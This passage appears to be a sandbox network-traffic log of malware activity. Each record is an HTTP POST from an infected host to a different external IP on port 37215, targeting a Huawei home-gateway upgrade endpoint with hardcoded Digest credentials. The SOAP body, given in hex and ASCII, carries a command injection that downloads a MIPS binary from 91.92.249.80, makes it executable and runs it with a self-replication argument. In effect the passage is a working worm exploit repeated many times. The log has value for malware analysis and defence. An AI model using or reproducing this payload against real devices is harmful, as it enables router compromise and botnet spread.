                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1266192.168.2.233755243.119.127.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328032970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1267192.168.2.2352142157.85.112.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328047037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1268192.168.2.234809648.40.171.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328057051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1269192.168.2.2338950197.61.116.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328068972 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1270192.168.2.235155054.18.152.17337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328082085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1271192.168.2.235270246.25.225.14337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328097105 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1272192.168.2.2347134157.145.43.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328108072 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1273192.168.2.2347184157.150.181.4037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328134060 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1274192.168.2.233332241.41.148.24937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328474045 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1275192.168.2.234595441.86.63.5937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.328481913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
